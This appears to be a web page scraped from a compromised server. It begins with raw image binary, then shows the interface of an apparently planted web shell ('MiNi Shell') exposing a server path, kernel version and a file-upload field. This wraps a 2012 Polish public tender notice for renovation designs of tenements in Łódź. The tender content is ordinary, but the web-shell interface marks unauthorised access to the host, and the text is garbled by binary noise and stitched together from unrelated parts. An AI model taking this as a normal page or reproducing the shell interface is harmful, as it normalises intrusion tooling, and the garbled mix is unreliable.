JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120810/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120810/296834-N-2012.html

<p class="kh_header"><b>Łódź: WYKONANIE PROJKTÓW TECHNICZNYCH NA REMONT KAMIENIC W ŁODZI W RAMACH PROGRAMU MIA 100 KAMIENIC</b><br>
<b>Numer ogłoszenia: 296834 - 2012; data zamieszczenia: 10.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Polesie "Radwańska" , ul. Radwańska 31, 90-540 Łódź, woj. łódzkie, tel. 042 6372736, faks 042 6372826.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> radwanska.com3.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE PROJKTÓW TECHNICZNYCH NA REMONT KAMIENIC W ŁODZI W RAMACH PROGRAMU MIA 100 KAMIENIC.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest wykonywanie projektów technicznych  remontów kamienic oraz projektów przebudowy lokali z wykonaniem pomieszczeń higieniczno-sanitarnych we wskazanych lokalach zgodnie z ustaleniami wymienionymi : 

Część I -kamienica przy ul. Żwirki 22 w Łodzi
 Wykonanie projektu remontu budynku  przy ul. Żwirki 22 w Łodzi oraz projektu przebudowy lokali z wykonaniem pomieszczeń higieniczno-sanitarnych obejmuje
1) wykonanie projektu technicznego zwanego dalej Projektem technicznym,
2) opracowanie przedmiaru robót i kosztorysu inwestorskiego dla prac objętych Projektem technicznym,
3)  uzyskanie pozwolenia na budowę
4) sprawowanie nadzoru autorskiego w trakcie realizacji prac ujętych w opracowanym Projekcie technicznym.
Projekt winien obejmować:
Remont izolacji i wzmocnienie  (podmurowanie) fundamentów
Wzmocnienie ścian i nadproży
Wzmocnienie ściany odchylonej od pionu
Wymiana stolarki okiennej i drzwiowej
Remont elewacji ocieplenie detale 
Remont balkonów 
Remont więźby dachowej z pokryciem
Remont i malowanie klatek schodowych
Rozbiórka budynków gospodarczych oraz wzniesienie budynku gospodarczego
Przebudowa lokali z wykonaniem pomieszczeń higieniczno-sanitarnych
Remont lokali na poddaszu
Remont wszystkich stropów z termomodernizacją i izolacją dzwiękochłonną 
Przemurowanie przewodów kominowych
Remont instalacji wodno-kanalizacyjnej gazowej i elektrycznej
Wykonanie węzła cieplnego i centralnego ogrzewania
Remont nawierzchni i ogrodzenie
informacji dotyczącej bezpieczeństwa i ochrony zdrowia
przedmiaru robót 
kosztorysu inwestorskiego i nakładczego
specyfikacji wykonania i odbioru robót
uzgodnienia z konserwatorem i UMŁ 

Projekt techniczny zostanie wykonany i przekazany Zamawiającemu w formie:
1) pisemnego opracowania wraz załącznikami graficznymi w 5 egzemplarzach,
2) elektronicznej na nośniku CD w formie edytowalnej i w formacie PDF 
w 3 egzemplarzach.
Wykonawca jest zobowiązany sporządzić przedmiar robót i kosztorys inwestorski w układzie kosztów rodzajowych (R+M+S) dla poszczególnych czynności przewidzianych projektem technicznym.
Roboty termomodernizacyjne należy opracować w postaci odrębnych kosztorysów. 
Złożenie dokumentacji celem uzyskania pozwolenia na budowę.
Zamawiający ze względu na krótki termin realizacji zamówienia dopuszcza uzyskanie pozwolenia na budowę do dnia 30.10.2012r.
Wykonawca zobowiązany jest do sprawowania nadzoru autorskiego w trakcie 
realizacji robót objętych Projektem technicznym. . Oferta ma uwzględniać koszt nadzoru autorskiego. 

Część II -kamienice przy ul Gdańska 154 w Łodzi
 Wykonanie projektu remontu budynku frontowego, poprzecznej oficyny, budynku gospodarczego  podwórza I ogrodzenia przy ul. Gdańskiej 154 oraz projektu przebudowy lokali z wykonaniem pomieszczeń higieniczno-sanitarnych obejmuje:
1) wykonanie projektu technicznego zwanego dalej Projektem technicznym,
2) opracowanie przedmiaru robót i kosztorysu inwestorskiego dla prac objętych Projektem technicznym,
3) uzyskanie pozwolenia na budowę
4) sprawowanie nadzoru autorskiego w trakcie realizacji prac ujętych w opracowanym Projekcie technicznym.
1.Projekt budynku mieszkalnego frontowego winien obejmować:
wzmocnienie ścian i nadproży
odwilgocenie fundamentów 
remont elewacji i prześwitu bramowego
wzmocnienie elementów więźby dachowej
ocieplenie ściany szczytowej
wymiany podestów i spoczników klatki schodowej
wzmocnienia stropów 
dobudowy i regulacji przewodów kominowych
przebudowy lokali
kolorystyki elewacji, wymiana stolarki okienno drzwiowej
remontu poddasza
projekt instalacji centralnego ogrzewania wraz z wykonaniem pomie4szczenia węzła centralnego ogrzewania 
projekt wymiany instalacji zimnej i ciepłej wody, kanalizacyjnej, gazowej oraz elektrycznej
projektu wymiany nawierzchni podwórza
 informacji dotyczącej bezpieczeństwa i ochrony zdrowia
przedmiaru robót 
kosztorysu inwestorskiego i nakładczego
specyfikacji wykonania i odbioru robót
uzgodnienia z konserwatorem i UMŁ 

Kubatura budynku 2961m3

2. Budynek mieszkalny poprzecznej oficyny winien obejmować:
wzmocnienie ścian i nadproży
odwilgocenie fundamentów 
remont elewacji i kolorystyki
ocieplenie 4 ścian szczytowych
remont klatki schodowej
wzmocnienia stropów
dobudowę i regulacji przewodów kominowych
przebudowę lokali
remont poddasza
wymianę stolarki okiennej i drzwiowej
przyłącze instalacji c.o. pomiędzy budynkiem frontowym i oficyną
projekt instalacji centralnego ogrzewania
projekt wymiany instalacji zimnej i ciepłej wody, kanalizacyjnej gazowej oraz elektrycznej
projekt wymiany nawierzchni podwórza
informacji dotyczącej bezpieczeństwa i ochrony zdrowia
przedmiar robót
kosztorys inwestorskiego i nakładczy
specyfikacje wykonania i odbioru robót
uzgodnienia z konserwatorem i UMŁ

Kubatura budynku 1415m3

3.Remont budynku gospodarczego i podwórza:
odwilgocenie fundamentów 
remont kolorystyki i elewacji
wymiany stolarki drzwiowe
projektu rozbiórki zabudowy gospodarczej drewnianej
projekt wymiany nawierzchni podwórza
projekt wykonania śmietnika
projekt ogrodzenia i naprawa istniejących ogrodzeń - murów
informacje dotyczącą bezpieczeństwa i ochrony zdrowia
przedmiar robót
kosztorysy inwestorskie i nakładcze
specyfikacje wykonania i odbioru robót
uzgodnienia z konserwatorem i UMŁ

Kubatura budynku 760 m3
Powierzchnia nawierzchni podwórza ok. 1200 m3
Długość ogrodzenia do postawienia 73m, remont istniejących ogrodzeń.

Projekt techniczny wraz z kosztorysami zostanie wykonany i przekazany Zamawiającemu w formie:
1) pisemnego opracowania wraz załącznikami graficznymi w 5 egzemplarzach,
2) elektronicznej na nośniku CD w formie edytowalnej i w formacie PDF 
w 3 egzemplarzach.
Wykonawca jest zobowiązany sporządzić przedmiar robót i kosztorys inwestorski w układzie kosztów rodzajowych (R+M+S) dla poszczególnych czynności przewidzianych projektem technicznym
Roboty termomodernizacyjne należy opracować w postaci odrębnych kosztorysów. 
Złożenie dokumentacji celem uzyskania pozwolenia na budowę. 
Zamawiający ze względu na krótki termin realizacji zamówienia dopuszcza uzyskanie pozwolenia na budowę do dnia 30.10.2012r.
Wykonawca zobowiązany jest do sprawowania nadzoru autorskiego w trakcie 
realizacji robót objętych Projektem technicznym. Oferta ma uwzględniać koszt nadzoru autorskiego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków art.22 ust. 1 Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków art.22 ust. 1 Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków art.22 ust. 1 Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków art.22 ust. 1 Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków art.22 ust. 1 Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zaakceptowany wzór umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy  przewiduje możliwość zmian istotnych postanowień zawartej umowy, które muszą zostać udokumentowane, w następującym zakresie:
a) zmiana terminu realizacji przedmiotu zamówienia będzie możliwa tylko w przypadku:
- zdarzeń losowych niezależnych od Wykonawcy lub Zamawiającego takich jak np.:  pożar, trzęsienie ziemi, powódź i innych gwałtownych zdarzeń wywołanych czynnikami atmosferycznymi;
b) przestojów i opóźnień w wykonywaniu przedmiotu umowy, zawinionych przez Zamawiającego,
c) zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy.
Termin wykonania robót może ulec wydłużeniu o okres trwania przeszkody uniemożliwiającej realizację robót, o której mowa powyżej. O braku możliwości dotrzymania terminu Wykonawca obowiązany jest niezwłocznie powiadomić pisemnie Zamawiającego, wskazując jednocześnie wraz z uzasadnieniem nowy termin wykonania robót. Zamawiający zatwierdzi lub odrzuci proponowany przez Wykonawcę okres przedłużenia terminu wykonania robót w terminie do 14 dni roboczych od daty otrzymania powiadomienia Wykonawcy. Okres przedłużenia terminu wykonania robót zostanie potwierdzony przez strony w aneksie do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> radwanska.com3.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:
 Administracja Nieruchomościami Łódź-Polesie RADWAŃSKA Łódź 90-540, ul. Radwańska 31 pokój nr 18 ( dział techniczny) codziennie w.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2012 godzina 10:00, miejsce: ofertę należy złożyć w siedzibie zamawiającego w pokoju nr 15 - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I -kamienica przy ul. Żwirki 22 w Łodzi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie projektu remontu budynku  przy ul. Żwirki 22 w Łodzi oraz projektu przebudowy lokali z wykonaniem pomieszczeń higieniczno-sanitarnych obejmuje
1) wykonanie projektu technicznego zwanego dalej Projektem technicznym,
2) opracowanie przedmiaru robót i kosztorysu inwestorskiego dla prac objętych Projektem technicznym,
3)  uzyskanie pozwolenia na budowę
4) sprawowanie nadzoru autorskiego w trakcie realizacji prac ujętych w opracowanym Projekcie technicznym.
Projekt winien obejmować:
Remont izolacji i wzmocnienie  (podmurowanie) fundamentów
Wzmocnienie ścian i nadproży
Wzmocnienie ściany odchylonej od pionu
Wymiana stolarki okiennej i drzwiowej
Remont elewacji ocieplenie detale 
Remont balkonów 
Remont więźby dachowej z pokryciem
Remont i malowanie klatek schodowych
Rozbiórka budynków gospodarczych oraz wzniesienie budynku gospodarczego
Przebudowa lokali z wykonaniem pomieszczeń higieniczno-sanitarnych
Remont lokali na poddaszu
Remont wszystkich stropów z termomodernizacją i izolacją dzwiękochłonną 
Przemurowanie przewodów kominowych
Remont instalacji wodno-kanalizacyjnej gazowej i elektrycznej
Wykonanie węzła cieplnego i centralnego ogrzewania
Remont nawierzchni i ogrodzenie
informacji dotyczącej bezpieczeństwa i ochrony zdrowia
przedmiaru robót 
kosztorysu inwestorskiego i nakładczego
specyfikacji wykonania i odbioru robót
uzgodnienia z konserwatorem i UMŁ 

Projekt techniczny zostanie wykonany i przekazany Zamawiającemu w formie:
1) pisemnego opracowania wraz załącznikami graficznymi w 5 egzemplarzach,
2) elektronicznej na nośniku CD w formie edytowalnej i w formacie PDF 
w 3 egzemplarzach.
Wykonawca jest zobowiązany sporządzić przedmiar robót i kosztorys inwestorski w układzie kosztów rodzajowych (R+M+S) dla poszczególnych czynności przewidzianych projektem technicznym.
Roboty termomodernizacyjne należy opracować w postaci odrębnych kosztorysów. 
Złożenie dokumentacji celem uzyskania pozwolenia na budowę.
Zamawiający ze względu na krótki termin realizacji zamówienia dopuszcza uzyskanie pozwolenia na budowę do dnia 30.10.2012r.
Wykonawca zobowiązany jest do sprawowania nadzoru autorskiego w trakcie 
realizacji robót objętych Projektem technicznym. . Oferta ma uwzględniać koszt nadzoru autorskiego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II -kamienice przy ul Gdańska 154 w Łodzi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie projektu remontu budynku frontowego, poprzecznej oficyny, budynku gospodarczego  podwórza I ogrodzenia przy ul. Gdańskiej 154 oraz projektu przebudowy lokali z wykonaniem pomieszczeń higieniczno-sanitarnych obejmuje:
1) wykonanie projektu technicznego zwanego dalej Projektem technicznym,
2) opracowanie przedmiaru robót i kosztorysu inwestorskiego dla prac objętych Projektem technicznym,
3) uzyskanie pozwolenia na budowę
4) sprawowanie nadzoru autorskiego w trakcie realizacji prac ujętych w opracowanym Projekcie technicznym.
1.Projekt budynku mieszkalnego frontowego winien obejmować:
wzmocnienie ścian i nadproży
odwilgocenie fundamentów 
remont elewacji i prześwitu bramowego
wzmocnienie elementów więźby dachowej
ocieplenie ściany szczytowej
wymiany podestów i spoczników klatki schodowej
wzmocnienia stropów 
dobudowy i regulacji przewodów kominowych
przebudowy lokali
kolorystyki elewacji, wymiana stolarki okienno drzwiowej
remontu poddasza
projekt instalacji centralnego ogrzewania wraz z wykonaniem pomie4szczenia węzła centralnego ogrzewania 
projekt wymiany instalacji zimnej i ciepłej wody, kanalizacyjnej, gazowej oraz elektrycznej
projektu wymiany nawierzchni podwórza
 informacji dotyczącej bezpieczeństwa i ochrony zdrowia
przedmiaru robót 
kosztorysu inwestorskiego i nakładczego
specyfikacji wykonania i odbioru robót
uzgodnienia z konserwatorem i UMŁ 

Kubatura budynku 2961m3

2. Budynek mieszkalny poprzecznej oficyny winien obejmować:
wzmocnienie ścian i nadproży
odwilgocenie fundamentów 
remont elewacji i kolorystyki
ocieplenie 4 ścian szczytowych
remont klatki schodowej
wzmocnienia stropów
dobudowę i regulacji przewodów kominowych
przebudowę lokali
remont poddasza
wymianę stolarki okiennej i drzwiowej
przyłącze instalacji c.o. pomiędzy budynkiem frontowym i oficyną
projekt instalacji centralnego ogrzewania
projekt wymiany instalacji zimnej i ciepłej wody, kanalizacyjnej gazowej oraz elektrycznej
projekt wymiany nawierzchni podwórza
informacji dotyczącej bezpieczeństwa i ochrony zdrowia
przedmiar robót
kosztorys inwestorskiego i nakładczy
specyfikacje wykonania i odbioru robót
uzgodnienia z konserwatorem i UMŁ

Kubatura budynku 1415m3

3.Remont budynku gospodarczego i podwórza:
odwilgocenie fundamentów 
remont kolorystyki i elewacji
wymiany stolarki drzwiowe
projektu rozbiórki zabudowy gospodarczej drewnianej
projekt wymiany nawierzchni podwórza
projekt wykonania śmietnika
projekt ogrodzenia i naprawa istniejących ogrodzeń - murów
informacje dotyczącą bezpieczeństwa i ochrony zdrowia
przedmiar robót
kosztorysy inwestorskie i nakładcze
specyfikacje wykonania i odbioru robót
uzgodnienia z konserwatorem i UMŁ

Kubatura budynku 760 m3
Powierzchnia nawierzchni podwórza ok. 1200 m3
Długość ogrodzenia do postawienia 73m, remont istniejących ogrodzeń.

Projekt techniczny wraz z kosztorysami zostanie wykonany i przekazany Zamawiającemu w formie:
1) pisemnego opracowania wraz załącznikami graficznymi w 5 egzemplarzach,
2) elektronicznej na nośniku CD w formie edytowalnej i w formacie PDF 
w 3 egzemplarzach.
Wykonawca jest zobowiązany sporządzić przedmiar robót i kosztorys inwestorski w układzie kosztów rodzajowych (R+M+S) dla poszczególnych czynności przewidzianych projektem technicznym
Roboty termomodernizacyjne należy opracować w postaci odrębnych kosztorysów. 
